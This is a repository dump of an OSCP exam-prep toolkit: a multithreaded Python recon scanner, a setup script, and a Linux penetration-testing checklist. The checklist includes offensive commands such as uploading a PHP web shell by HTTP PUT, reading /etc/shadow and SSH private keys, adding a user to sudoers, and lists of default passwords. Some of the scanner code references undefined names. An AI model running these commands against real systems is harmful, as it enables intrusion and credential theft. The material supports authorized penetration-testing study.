Repository: xapax/oscp
Branch: master
Commit: 7ea469640337
Files: 6
Total size: 43.4 KB
Directory structure:
gitextract_kkjeoamh/
├── README.md
├── recon_enum/
│ └── reconscan.py
├── reports/
│ └── reports.txt
├── setup.sh
└── templates/
├── linux-template.md
└── windows-template.md
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# oscp
## Reconscan.py
This script is based on the script by [Mike Czumak](http://www.securitysift.com/offsec-pwb-oscp/). But it is heavily rewritten, some things have been added, other stuff has been removed. The script is written as a preparation for the OSCP exam. It was never meant to be a general script. So if you want to use it you have to make sure to fix all the hardcoded paths. The script is multithreaded and can be run against several hosts at once.
The script is invoked like this:
```
python reconscan.py 192.168.1.101 192.168.1.102 192.168.1.103
```
One important thing to note is that I removed the scan for all ports. Because it would sometimes just take to long to run. So make sure you either add that scan or run it afterwards. So you don't miss any ports.
Please note that the script includes dirb and nikto-scans that are very invasive. The script also includes several nmap-scripts that check for vulnerabilities. So yeah, this script would be pretty illegal and bad to run against a machine you don't have permission to attack.
## Templates
I created two templates that I used as a guide for every machine I attacked. One template is for Linux machines and the other for windows. There are some differences between them. The templates became kind of my checklists. They are divided into three sections: **recon**, **privilege escalation** and **loot**.
The templates are written in markdown. But I never actually rendered them, so I don't really know how they look like rendered. They are probably pretty messy. I also used them together with markdown syntax-highlightning in my editor, so it became easy to navigate the files.
The templates have a few keywords in the, like **INSERTIPADDRESS**. These are hooks that are read by reconscan.py, and it insert the target machine IP-address automatically. Some other stuff are also inserted automatically, like the a basic nmap-scan. And nikto-scan.
Wherever there are references to a book. This is the book: https://bobloblaw.gitbooks.io/security/content/
================================================
FILE: recon_enum/reconscan.py
================================================
#!/usr/bin/env python
import subprocess
import multiprocessing
from multiprocessing import Process, Queue
import os
import time
import fileinput
import atexit
import sys
import socket
import re
# Todo:
# Add mysql nmap-script
# Change replace to sed:
# sed 's|literal_pattern|replacement_string|g'
start = time.time()
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# Creates a function for multiprocessing. Several things at once.
def multProc(targetin, scanip, port):
jobs = []
p = multiprocessing.Process(target=targetin, args=(scanip,port))
jobs.append(p)
p.start()
return
def connect_to_port(ip_address, port, service):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip_address, int(port)))
banner = s.recv(1024)
if service == "ftp":
s.send("USER anonymous\r\n")
user = s.recv(1024)
s.send("PASS anonymous\r\n")
password = s.recv(1024)
total_communication = banner + "\r\n" + user + "\r\n" + password
write_to_file(ip_address, "ftp-connect", total_communication)
elif service == "smtp":
total_communication = banner + "\r\n"
write_to_file(ip_address, "smtp-connect", total_communication)
elif service == "ssh":
total_communication = banner
write_to_file(ip_address, "ssh-connect", total_communication)
elif service == "pop3":
s.send("USER root\r\n")
user = s.recv(1024)
s.send("PASS root\r\n")
password = s.recv(1024)
total_communication = banner + user + password
write_to_file(ip_address, "pop3-connect", total_communication)
s.close()
def write_to_file(ip_address, enum_type, data):
file_path_linux = '../reports/%s/mapping-linux.md' % (ip_address)
file_path_windows = '../reports/%s/mapping-windows.md' % (ip_address)
paths = [file_path_linux, file_path_windows]
print bcolors.OKGREEN + "INFO: Writing " + enum_type + " to template files:\n " + file_path_linux + " \n" + file_path_windows + bcolors.ENDC
for path in paths:
if enum_type == "portscan":
subprocess.check_output("replace INSERTTCPSCAN \"" + data + "\" -- " + path, shell=True)
if enum_type == "dirb":
subprocess.check_output("replace INSERTDIRBSCAN \"" + data + "\" -- " + path, shell=True)
if enum_type == "nikto":
subprocess.check_output("replace INSERTNIKTOSCAN \"" + data + "\" -- " + path, shell=True)
if enum_type == "ftp-connect":
subprocess.check_output("replace INSERTFTPTEST \"" + data + "\" -- " + path, shell=True)
if enum_type == "smtp-connect":
subprocess.check_output("replace INSERTSMTPCONNECT \"" + data + "\" -- " + path, shell=True)
if enum_type == "ssh-connect":
subprocess.check_output("replace INSERTSSHCONNECT \"" + data + "\" -- " + path, shell=True)
if enum_type == "pop3-connect":
subprocess.check_output("replace INSERTPOP3CONNECT \"" + data + "\" -- " + path, shell=True)
if enum_type == "curl":
subprocess.check_output("replace INSERTCURLHEADER \"" + data + "\" -- " + path, shell=True)
return
def dirb(ip_address, port, url_start, wordlist="/usr/share/wordlist/dirb/big.txt, /usr/share/wordlist/dirb/vulns/cgis.txt"):
print bcolors.HEADER + "INFO: Starting dirb scan for " + ip_address + bcolors.ENDC
DIRBSCAN = "dirb %s://%s:%s %s -o ../reports/%s/dirb-%s.txt -r" % (url_start, ip_address, port, ip_address, ip_address, wordlist)
print bcolors.HEADER + DIRBSCAN + bcolors.ENDC
results_dirb = subprocess.check_output(DIRBSCAN, shell=True)
print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with dirb scan for " + ip_address + bcolors.ENDC
print results_dirb
write_to_file(ip_address, "dirb", results_dirb)
return
def nikto(ip_address, port, url_start):
print bcolors.HEADER + "INFO: Starting nikto scan for " + ip_address + bcolors.ENDC
NIKTOSCAN = "nikto -h %s://%s -o ../reports/%s/nikto-%s-%s.txt" % (url_start, ip_address, ip_address, url_start, ip_address)
print bcolors.HEADER + NIKTOSCAN + bcolors.ENDC
results_nikto = subprocess.check_output(NIKTOSCAN, shell=True)
print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with NIKTO-scan for " + ip_address + bcolors.ENDC
print results_nikto
write_to_file(ip_address, "nikto", results_nikto)
return
def httpEnum(ip_address, port):
print bcolors.HEADER + "INFO: Detected http on " + ip_address + ":" + port + bcolors.ENDC
print bcolors.HEADER + "INFO: Performing nmap web script scan for " + ip_address + ":" + port + bcolors.ENDC
dirb_process = multiprocessing.Process(target=dirb, args=(ip_address,port,"http"))
dirb_process.start()
nikto_process = multiprocessing.Process(target=nikto, args=(ip_address,port,"http"))
nikto_process.start()
CURLSCAN = "curl -I http://%s" % (ip_address)
print bcolors.HEADER + CURLSCAN + bcolors.END
curl_results = subprocess.check_output(CURLSCAN, shell=True)
write_to_file(ip_address, "curl", curl_results)
HTTPSCAN = "nmap -sV -Pn -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-devframework,http-enum,http-frontpage-login,http-git,http-iis-webdav-vuln,http-php-version,http-robots.txt,http-shellshock,http-vuln-cve2015-1635 -oN ../reports/%s/%s_http.nmap %s" % (port, ip_address, ip_address, ip_address)
print bcolors.HEADER + HTTPSCAN + bcolors.ENDC
http_results = subprocess.check_output(HTTPSCAN, shell=True)
print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with HTTP-SCAN for " + ip_address + bcolors.ENDC
print http_results
return
def httpsEnum(ip_address, port):
print bcolors.HEADER + "INFO: Detected https on " + ip_address + ":" + port + bcolors.ENDC
print bcolors.HEADER + "INFO: Performing nmap web script scan for " + ip_address + ":" + port + bcolors.ENDC
dirb_process = multiprocessing.Process(target=dirb, args=(ip_address,port,"https"))
dirb_process.start()
nikto_process = multiprocessing.Process(target=nikto, args=(ip_address,port,"https"))
nikto_process.start()
SSLSCAN = "sslscan %s:%s >> ../reports/%s/ssl_scan_%s" % (ip_address, port, ip_address, ip_address)
print bcolors.HEADER + SSLSCAN + bcolors.ENDC
ssl_results = subprocess.check_output(SSLSCAN, shell=True)
print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with SSLSCAN for " + ip_address + bcolors.ENDC
HTTPSCANS = "nmap -sV -Pn -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-devframework,http-enum,http-frontpage-login,http-git,http-iis-webdav-vuln,http-php-version,http-robots.txt,http-shellshock,http-vuln-cve2015-1635 -oN ../reports/%s/%s_http.nmap %s" % (port, ip_address, ip_address, ip_address)
print bcolors.HEADER + HTTPSCANS + bcolors.ENDC
https_results = subprocess.check_output(HTTPSCANS, shell=True)
print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with HTTPS-scan for " + ip_address + bcolors.ENDC
print https_results
return
def mssqlEnum(ip_address, port):
print bcolors.HEADER + "INFO: Detected MS-SQL on " + ip_address + ":" + port + bcolors.ENDC
print bcolors.HEADER + "INFO: Performing nmap mssql script scan for " + ip_address + ":" + port + bcolors.ENDC
MSSQLSCAN = "nmap -sV -Pn -p %s --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes,mysql-empty-password,mysql-brute,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 --script-args=mssql.instance-port=1433,mssql.username=sa,mssql.password=sa -oN ../reports/%s/mssql_%s.nmap %s" % (port, ip_address, ip_address)
print bcolors.HEADER + MSSQLSCAN + bcolors.ENDC
mssql_results = subprocess.check_output(MSSQLSCAN, shell=True)
print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with MSSQL-scan for " + ip_address + bcolors.ENDC
print mssql_results
return
def smtpEnum(ip_address, port):
print bcolors.HEADER + "INFO: Detected smtp on " + ip_address + ":" + port + bcolors.ENDC
connect_to_port(ip_address, port, "smtp")
SMTPSCAN = "nmap -sV -Pn -p %s --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 %s -oN ../reports/%s/smtp_%s.nmap" % (port, ip_address, ip_address, ip_address)
print bcolors.HEADER + SMTPSCAN + bcolors.ENDC
smtp_results = subprocess.check_output(SMTPSCAN, shell=True)
print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SMTP-scan for " + ip_address + bcolors.ENDC
print smtp_results
# write_to_file(ip_address, "smtp", smtp_results)
return
def smbNmap(ip_address, port):
print "INFO: Detected SMB on " + ip_address + ":" + port
smbNmap = "nmap --script=smb-enum-shares,smb-ls,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos %s -oN ../reports/%s/smb_%s.nmap" % (ip_address, ip_address, ip_address)
smbNmap_results = subprocess.check_output(smbNmap, shell=True)
print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SMB-Nmap-scan for " + ip_address + bcolors.ENDC
print smbNmap_results
return
def smbEnum(ip_address, port):
print "INFO: Detected SMB on " + ip_address + ":" + port
enum4linux = "enum4linux -a %s > ../reports/%s/enum4linux_%s 2>/dev/null" % (ip_address, ip_address, ip_address)
enum4linux_results = subprocess.check_output(enum4linux, shell=True)
print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with ENUM4LINUX-Nmap-scan for " + ip_address + bcolors.ENDC
print enum4linux_results
return
def ftpEnum(ip_address, port):
print bcolors.HEADER + "INFO: Detected ftp on " + ip_address + ":" + port + bcolors.ENDC
connect_to_port(ip_address, port, "ftp")
FTPSCAN = "nmap -sV -Pn -p %s --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -oN '../reports/%s/ftp_%s.nmap' %s" % (port, ip_address, ip_address, ip_address)
print bcolors.HEADER + FTPSCAN + bcolors.ENDC
results_ftp = subprocess.check_output(FTPSCAN, shell=True)
print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with FTP-Nmap-scan for " + ip_address + bcolors.ENDC
print results_ftp
return
def udpScan(ip_address):
print bcolors.HEADER + "INFO: Detected UDP on " + ip_address + bcolors.ENDC
UDPSCAN = "nmap -Pn -A -sC -sU -T 3 --top-ports 200 -oN '../reports/%s/udp_%s.nmap' %s" % (ip_address, ip_address, ip_address)
print bcolors.HEADER + UDPSCAN + bcolors.ENDC
udpscan_results = subprocess.check_output(UDPSCAN, shell=True)
print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with UDP-Nmap scan for " + ip_address + bcolors.ENDC
print udpscan_results
UNICORNSCAN = "unicornscan -mU -I %s > ../reports/%s/unicorn_udp_%s.txt" % (ip_address, ip_address, ip_address)
unicornscan_results = subprocess.check_output(UNICORNSCAN, shell=True)
print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with UNICORNSCAN for " + ip_address + bcolors.ENDC
def sshScan(ip_address, port):
print bcolors.HEADER + "INFO: Detected SSH on " + ip_address + ":" + port + bcolors.ENDC
connect_to_port(ip_address, port, "ssh")
SSHSCAN = "nmap -sV -Pn -p %s --script=ssh-auth-methods,ssh-hostkey,ssh-run,sshv1 -oN '../reports/%s/ssh_%s.nmap' %s" % (port, ip_address, ip_address, ip_address)
print bcolors.HEADER + SSHSCAN + bcolors.ENDC
results_ssh = subprocess.check_output(SSHSCAN, shell=True)
print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SSH-Nmap-scan for " + ip_address + bcolors.ENDC
print results_ssh
return
def pop3Scan(ip_address, port):
print bcolors.HEADER + "INFO: Detected POP3 on " + ip_address + ":" + port + bcolors.ENDC
connect_to_port(ip_address, port, "pop3")
POP3SCAN = "nmap -sV -Pn -p %s --script=pop3-brute,pop3-capabilities,pop3-ntlm-info -oN '../reports/%s/pop3_%s.nmap' %s" % (port, ip_address, ip_address, ip_address)
print bcolors.HEADER + SSHSCAN + bcolors.ENDC
results_pop3 = subprocess.check_output(POP3SCAN, shell=True)
print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with POP3-Nmap-scan for " + ip_address + bcolors.ENDC
print results_pop3
return
def nmapScan(ip_address):
ip_address = ip_address.strip()
print bcolors.OKGREEN + "INFO: Running general TCP/UDP nmap scans for " + ip_address + bcolors.ENDC
TCPSCAN = "nmap -sV -O %s -oN '../reports/%s/%s.nmap'" % (ip_address, ip_address, ip_address)
print bcolors.HEADER + TCPSCAN + bcolors.ENDC
results = subprocess.check_output(TCPSCAN, shell=True)
print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with BASIC Nmap-scan for " + ip_address + bcolors.ENDC
print results
p = multiprocessing.Process(target=udpScan, args=(scanip,))
p.start()
write_to_file(ip_address, "portscan", results)
lines = results.split("\n")
serv_dict = {}
for line in lines:
ports = []
line = line.strip()
if ("tcp" in line) and ("open" in line) and not ("Discovered" in line):
# print line
while " " in line:
line = line.replace(" ", " ");
linesplit= line.split(" ")
service = linesplit[2] # grab the service name
port = line.split(" ")[0] # grab the port/proto
# print port
if service in serv_dict:
ports = serv_dict[service] # if the service is already in the dict, grab the port list
ports.append(port)
# print ports
serv_dict[service] = ports # add service to the dictionary along with the associated port(2)
# go through the service dictionary to call additional targeted enumeration functions
for serv in serv_dict:
ports = serv_dict[serv]
if re.search(r"http[^s]", serv):
for port in ports:
port = port.split("/")[0]
multProc(httpEnum, ip_address, port)
elif re.search(r"https|ssl", serv):
for port in ports:
port = port.split("/")[0]
multProc(httpsEnum, ip_address, port)
elif "smtp" in serv:
for port in ports:
port = port.split("/")[0]
multProc(smtpEnum, ip_address, port)
elif "ftp" in serv:
for port in ports:
port = port.split("/")[0]
multProc(ftpEnum, ip_address, port)
elif ("microsoft-ds" in serv) or ("netbios-ssn" == serv):
for port in ports:
port = port.split("/")[0]
multProc(smbEnum, ip_address, port)
multProc(smbNmap, ip_address, port)
elif "ms-sql" in serv:
for port in ports:
port = port.split("/")[0]
multProc(mssqlEnum, ip_address, port)
elif "ssh" in serv:
for port in ports:
port = port.split("/")[0]
multProc(sshScan, ip_address, port)
elif "snmp" in serv:
for port in ports:
port = port.split("/")[0]
multProc(snmpEnum, ip_address, port)
return
print bcolors.HEADER
print "------------------------------------------------------------"
print "!!!! RECON SCAN !!!!!"
print "!!!! A multi-process service scanner !!!!!"
print "!!!! dirb, nikto, ftp, ssh, mssql, pop3, tcp !!!!!"
print "!!!! udp, smtp, smb !!!!!"
print "------------------------------------------------------------"
if len(sys.argv) < 2:
print ""
print "Usage: python reconscan.py <ip> <ip> <ip>"
print "Example: python reconscan.py 192.168.1.101 192.168.1.102"
print ""
print "############################################################"
pass
sys.exit()
print bcolors.ENDC
if __name__=='__main__':
# Setting ip targets
targets = sys.argv
targets.pop(0)
dirs = os.listdir("../reports/")
for scanip in targets:
scanip = scanip.rstrip()
if not scanip in dirs:
print bcolors.HEADER + "INFO: No folder was found for " + scanip + ". Setting up folder." + bcolors.ENDC
subprocess.check_output("mkdir ../reports/" + scanip, shell=True)
subprocess.check_output("mkdir ../reports/" + scanip + "/exploits", shell=True)
subprocess.check_output("mkdir ../reports/" + scanip + "/privesc", shell=True)
print bcolors.OKGREEN + "INFO: Folder created here: " + "../reports/" + scanip + bcolors.ENDC
subprocess.check_output("cp ../templates/windows-template.md ../reports/" + scanip + "/mapping-windows.md", shell=True)
subprocess.check_output("cp ../templates/linux-template.md ../reports/" + scanip + "/mapping-linux.md", shell=True)
print bcolors.OKGREEN + "INFO: Added pentesting templates: " + "../reports/" + scanip + bcolors.ENDC
subprocess.check_output("sed -i -e 's/INSERTIPADDRESS/" + scanip + "/g' ../reports/" + scanip + "/mapping-windows.md", shell=True)
subprocess.check_output("sed -i -e 's/INSERTIPADDRESS/" + scanip + "/g' ../reports/" + scanip + "/mapping-linux.md", shell=True)
p = multiprocessing.Process(target=nmapScan, args=(scanip,))
p.start()
================================================
FILE: reports/reports.txt
================================================
================================================
FILE: setup.sh
================================================
#!/bin/bash
folder=$(find /home /usr /var /tmp /opt /mnt /root -type d -name recon_enum -print -quit 2>/dev/null)
echo -e '#!/bin/bash\n' > /usr/bin/reconscan
echo -e "cd $folder && python reconscan.py \"\$@\" \n" >> /usr/bin/reconscan
chmod +x /usr/bin/reconscan
================================================
FILE: templates/linux-template.md
================================================
## Info-sheet
- DNS-Domain name:
- Host name:
- OS:
- Server:
- Kernel:
- Workgroup:
- Windows domain:
Services and ports:
INSERTTCPSCAN
## Recon
```
Always start with a stealthy scan to avoid closing ports.
# Syn-scan
nmap -sS INSERTIPADDRESS
# Scan all ports, might take a while.
nmap INSERTIPADDRESS -p-
# Service-version, default scripts, OS:
nmap INSERTIPADDRESS -sV -sC -O -p 111,222,333
# Scan for UDP
nmap INSERTIPADDRESS -sU
unicornscan -mU -v -I INSERTIPADDRESS
# Connect to udp if one is open
nc -u INSERTIPADDRESS 48772
# Monster scan
nmap INSERTIPADDRESS -p- -A -T4 -sC
```
### Port 21 - FTP
- FTP-Name:
- FTP-version:
- Anonymous login:
INSERTFTPTEST
```
nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS
```
### Port 22 - SSH
- Name:
- Version:
- Takes-password:
- If you have usernames test login with username:username
INSERTSSHCONNECT
```
nc INSERTIPADDRESS 22
```
### Port 25
- Name:
- Version:
- VRFY:
INSERTSMTPCONNECT
```
nc -nvv INSERTIPADDRESS 25
HELO foo<cr><lf>
telnet INSERTIPADDRESS 25
VRFY root
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS
```
### Port 69 - UDP - TFTP
This is used for tftp-server.
### Port 110 - Pop3
- Name:
- Version:
INSERTPOP3CONNECT
```
telnet INSERTIPADDRESS 110
USER pelle@INSERTIPADDRESS
PASS admin
or:
USER pelle
PASS admin
# List all emails
list
# Retrieve email number 5, for example
retr 9
```
### Port 111 - Rpcbind
```
rpcinfo -p INSERTIPADDRESS
```
### Port 135 - MSRPC
Some versions are vulnerable.
### Port 143 - Imap
### Port 139/445 - SMB
- Name:
- Version:
- Domain/workgroup name:
- Domain-sid:
- Allows unauthenticated login:
```
nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445
enum4linux -a INSERTIPADDRESS
rpcclient -U "" INSERTIPADDRESS
srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall
smbclient -L INSERTIPADDRESS
smbclient //INSERTIPADDRESS/tmp
smbclient \\\\INSERTIPADDRESS\\ipc$ -U john
smbclient //INSERTIPADDRESS/ipc$ -U john
```
### Port 161/162 UDP - SNMP
```
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS
snmp-check -t INSERTIPADDRESS -c public
```
```
# Common community strings
public
private
community
```
### Port 554 - RTSP
### Port 1030/1032/1033/1038
Used by RPC to connect in domain network.
## Port 1521 - Oracle
- Name:
- Version:
- Password protected:
```
tnscmd10g version -h INSERTIPADDRESS
tnscmd10g status -h INSERTIPADDRESS
```
### Port 2049 - NFS
```
showmount -e INSERTIPADDRESS
If you find anything you can mount it like this:
mount INSERTIPADDRESS:/ /tmp/NFS
mount -t INSERTIPADDRESS:/ /tmp/NFS
```
### Port 2100 - Oracle XML DB
- Name:
- Version:
- Default logins:
```
sys:sys
scott:tiger
```
Default passwords
https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm
### 3306 - MySQL
- Name:
- Version:
```
nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse INSERTIPADDRESS -p 3306
mysql --host=INSERTIPADDRESS -u root -p
```
### Port 3339 - Oracle web interface
- Basic info about web service (apache, nginx, IIS)
- Server:
- Scripting language:
- Apache Modules:
- IP-address:
### Port 80 - Web server
- Server:
- Scripting language:
- Apache Modules:
- IP-address:
- Domain-name address:
INSERTCURLHEADER
- Web application (ex, wordpress, joomla, phpmyadmin)
- Name:
- Version:
- Admin-login:
```
# Nikto
nikto -h http://INSERTIPADDRESS
# Nikto with squid proxy
nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444
# CMS Explorer
cms-explorer -url http://INSERTIPADDRESS -type [Drupal, WordPress, Joomla, Mambo]
# WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users)
wpscan --url http://INSERTIPADDRESS
wpscan --url http://INSERTIPADDRESS --enumerate vp
wpscan --url http://INSERTIPADDRESS --enumerate vt
wpscan --url http://INSERTIPADDRESS --enumerate u
# Joomscan
joomscan -u http://INSERTIPADDRESS
joomscan -u http://INSERTIPADDRESS --enumerate-components
# Get header
curl -i INSERTIPADDRESS
# Get everything
curl -i -L INSERTIPADDRESS
# Check for title and all links
curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
# Look at page with just text
curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq
# Check if it is possible to upload
curl -v -X OPTIONS http://INSERTIPADDRESS/
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://INSERTIPADDRESS/test/shell.php
dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix
```
#### Nikto scan
INSERTNIKTOSCAN
#### Url brute force
```
# Not recursive
dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt
# Gobuster - remove relevant responde codes (403 for example)
gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
```
INSERTDIRBSCAN
#### Default/Weak login
Search documentation for default passwords and test them
```
site:webapplication.com password
```
```
admin admin
admin password
admin <blank>
admin <servicename>
root root
root admin
root password
root <servicename>
<username if you have> password
<username if you have> admin
<username if you have> username
username <servicename>
```
#### LFI/RFI
```
fimap -u "http://INSERTIPADDRESS/example.php?test="
# Ordered output
curl -s http://INSERTIPADDRESS/gallery.php?page=/etc/passwd
/root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page=
```
#### SQL-Injection
```
# Post
./sqlmap.py -r search-test.txt -p tfUPass
# Get
sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql
# Crawl
sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3
```
#### Sql-login-bypass
- Open Burp-suite
- Make and intercept a request
- Send to intruder
- Cluster attack.
- Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html)
- Attack
- Check for response length variation
### Password brute force - last resort
```
cewl
```
### Port 443 - HTTPS
Heartbleed:
```
# Heartbleed
sslscan INSERTIPADDRESS:443
```
## Vulnerability analysis
Now we have gathered information about the system. Now comes the part where we look for exploits and vulnerabilites and features.
### To try - List of possibilies
Add possible exploits here:
### Find sploits - Searchsploit and google
Where there are many exploits for a software, use google. It will automatically sort it by popularity.
```
site:exploit-db.com apache 2.4.7
# Remove dos-exploits
searchsploit Apache 2.4.7 | grep -v '/dos/'
searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat"
# Only search the title (exclude the path), add the -t
searchsploit -t Apache | grep -v '/dos/'
```
----------------------------------------------------------------------------
'''''''''''''''''''''''''''''''''' PRIVESC '''''''''''''''''''''''''''''''''
-----------------------------------------------------------------------------
## Privilege escalation
Now we start the whole enumeration-process over gain.
- Kernel exploits
- Programs running as root
- Installed software
- Weak/reused/plaintext passwords
- Inside service
- Suid misconfiguration
- World writable scripts invoked by root
- Unmounted filesystems
Less likely
- Private ssh keys
- Bad path configuration
- Cronjobs
### To-try list
Here you will add all possible leads. What to try.
### Useful commands
```
# Spawning shell
python -c 'import pty; pty.spawn("/bin/sh")'
# Access to more binaries
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# Set up webserver
cd /root/oscp/useful-tools/privesc/linux/privesc-scripts; python -m SimpleHTTPServer 8080
# Download all files
wget http://192.168.1.101:8080/ -r; mv 192.168.1.101:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linprivchecker.py unix-privesc-check
./LinEnum.sh -t -k password -r LinEnum.txt
python linprivchecker.py extended
./unix-privesc-check standard
# Writable directories
/tmp
/var/tmp
# Add user to sudoers
echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers
```
### Basic info
- OS:
- Version:
- Kernel version:
- Architecture:
- Current user:
**Devtools:**
- GCC:
- NC:
- WGET:
**Users with login:**
```
uname -a
env
id
cat /proc/version
cat /etc/issue
cat /etc/passwd
cat /etc/group
cat /etc/shadow
cat /etc/hosts
# Users with login
grep -vE "nologin" /etc/passwd
# Priv Enumeration Scripts
upload /unix-privesc-check
upload /root/Desktop/Backup/Tools/Linux_privesc_tools/linuxprivchecker.py ./
upload /root/Desktop/Backup/Tools/Linux_privesc_tools/LinEnum.sh ./
python linprivchecker.py extended
./LinEnum.sh -t -k password
unix-privesc-check
```
### Kernel exploits
```
site:exploit-db.com kernel version
perl /root/oscp/useful-tools/privesc/linux/Linux_Exploit_Suggester/Linux_Exploit_Suggester.pl -k 2.6
python linprivchecker.py extended
```
### Programs running as root
Look for webserver, mysql or anything else like that.
```
# Metasploit
ps
# Linux
ps aux
```
### Installed software
```
/usr/local/
/usr/local/src
/usr/local/bin
/opt/
/home
/var/
/usr/src/
# Debian
dpkg -l
# CentOS, OpenSuse, Fedora, RHEL
rpm -qa (CentOS / openSUSE )
# OpenBSD, FreeBSD
pkg_info
```
### Weak/reused/plaintext passwords
- Check database config-file
- Check databases
- Check weak passwords
```
username:username
username:username1
username:root
username:admin
username:qwerty
username:password
```
- Check plaintext
```
./LinEnum.sh -t -k password
```
### Inside service
```
# Linux
netstat -anlp
netstat -ano
```
### Suid misconfiguration
Binary with suid permission can be run by anyone, but when they are run they are run as root!
Example programs:
```
nmap
vim
nano
```
```
find / -perm -u=s -type f 2>/dev/null
```
### Unmounted filesystems
Here we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc process over again.
```
mount -l
```
### Cronjob
Look for anything that is owned by privileged user but writable for you
```
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
```
### SSH Keys
Check all home directories
```
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
```
### Bad path configuration
Require user interaction
------------------------------------------------------------------------
----------------------------- LOOT LOOT LOOT LOOT ----------------------
------------------------------------------------------------------------
## Loot
**Checklist**
- Proof:
- Network secret:
- Passwords and hashes:
- Dualhomed:
- Tcpdump:
- Interesting files:
- Databases:
- SSH-keys:
- Browser:
- Mail:
### Proof
```
/root/proof.txt
```
### Network secret
```
/root/network-secret.txt
```
### Passwords and hashes
```
cat /etc/passwd
cat /etc/shadow
unshadow passwd shadow > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
```
### Dualhomed
```
ifconfig
ifconfig -a
arp -a
```
### Tcpdump
```
tcpdump -i any -s0 -w capture.pcap
tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X
